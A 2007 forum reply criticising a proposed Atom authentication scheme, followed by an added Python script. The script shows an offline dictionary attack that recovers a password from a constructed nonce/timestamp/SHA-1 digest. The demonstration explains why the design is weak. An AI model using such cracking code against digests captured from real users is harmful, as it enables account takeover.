
Article: Atom Authentication
Subject: No secret sauce
Date: 2007-03-06 09:30:54
From: cryptoanarchist

Your discussion of the need for Atom authentication is good and valid. However, I disagree that the scheme you propose at the end of the article is necessarily secure or even adds a significant amount of security over cleartext passwords.


The problem is that a dictionary attack on the possible passwords is very easy. A number of studies on the weakness of user-chosen passwords have concluded that users are just very, very bad at choosing strong passwords.


As a result, the number of possible input passwords in a dictionary attack is very low: 20-25 bits of entropy at most. Since the nonce and timestamp are known values, dictionary-attacking the unknown value requires trivial CPU time.


At best, you are achieving additional layers of obfuscation and requiring the attacker to have access to an SHA-1 implementation.


However, don't let that distract from the very good discussion on the need for better Atom Authentication. Better solutions in that area that folks like Bob can deploy are problems in need of solutions.
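The attack the poster describes, as an added example that is not part of the original article or this reply. The digest layout is an assumption: a WSSE-style PasswordDigest, Base64(SHA-1(nonce || created || password)), which is the kind of scheme being criticised; the article's exact construction is not reproduced here. The captured nonce, timestamp, digest, and the wordlist are all constructed for the example. The attacker only needs the three values visible on the wire and a small wordlist with a few mangling rules.

```python
"""Dictionary attack on a nonce + timestamp + SHA-1 password digest.

Added example, not code from the original article or the poster.
ASSUMED digest layout (WSSE-style PasswordDigest):
    digest = Base64( SHA-1( nonce || created || password ) )
All inputs below are constructed for the example.
"""
import base64
import hashlib
import time


def password_digest(nonce: bytes, created: str, password: str) -> str:
    """What the client sends in place of the cleartext password."""
    h = hashlib.sha1(nonce + created.encode() + password.encode()).digest()
    return base64.b64encode(h).decode()


def candidate_passwords(words):
    """Cheap mangling rules of the kind users actually follow.

    Each word expands to 2 bases x 6 forms = 12 candidates.
    """
    for w in words:
        for base in (w, w.capitalize()):
            yield base
            for suffix in ("1", "12", "123", "!", "2007"):
                yield base + suffix


def dictionary_attack(nonce, created, digest, candidates):
    """Try each candidate against the captured digest.

    Returns (password, hashes_tried) on success, (None, hashes_tried) otherwise.
    The nonce and timestamp are public, so one SHA-1 per guess is all it costs.
    """
    tried = 0
    for pw in candidates:
        tried += 1
        if password_digest(nonce, created, pw) == digest:
            return pw, tried
    return None, tried


def hashes_per_second(n=20000):
    """Rough single-core rate in pure Python, to size the 2^25 keyspace claim."""
    nonce, created = b"x" * 16, "2007-03-06T09:30:54Z"
    t0 = time.perf_counter()
    for i in range(n):
        password_digest(nonce, created, str(i))
    return n / (time.perf_counter() - t0)


# Constructed "captured" request: an eavesdropper sees all three of these.
CAPTURED_NONCE = b"d36e316282959a9ed4c89851497a717f"
CAPTURED_CREATED = "2007-03-06T09:30:54Z"
# The weak password is used only to build the sample capture; the attack
# below never reads it.
CAPTURED_DIGEST = password_digest(CAPTURED_NONCE, CAPTURED_CREATED, "letmein1")

# Constructed wordlist; real ones run to millions of entries.
WORDLIST = ["password", "123456", "qwerty", "abc123", "monkey", "letmein", "dragon"]

if __name__ == "__main__":
    pw, tried = dictionary_attack(CAPTURED_NONCE, CAPTURED_CREATED, CAPTURED_DIGEST,
                                  candidate_passwords(WORDLIST))
    print(f"recovered {pw!r} after {tried} SHA-1 computations")
    rate = hashes_per_second()
    print(f"{rate:,.0f} digests/s in pure Python; "
          f"a 2^25 keyspace takes about {2**25 / rate:.0f} s on one core")
```

Note that the digest changes on every request because of the nonce and timestamp, which stops replay of that one request, but it does nothing for the password itself: each captured request is an independent oracle for offline guessing, and a native SHA-1 implementation runs orders of magnitude faster than the pure-Python loop above.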

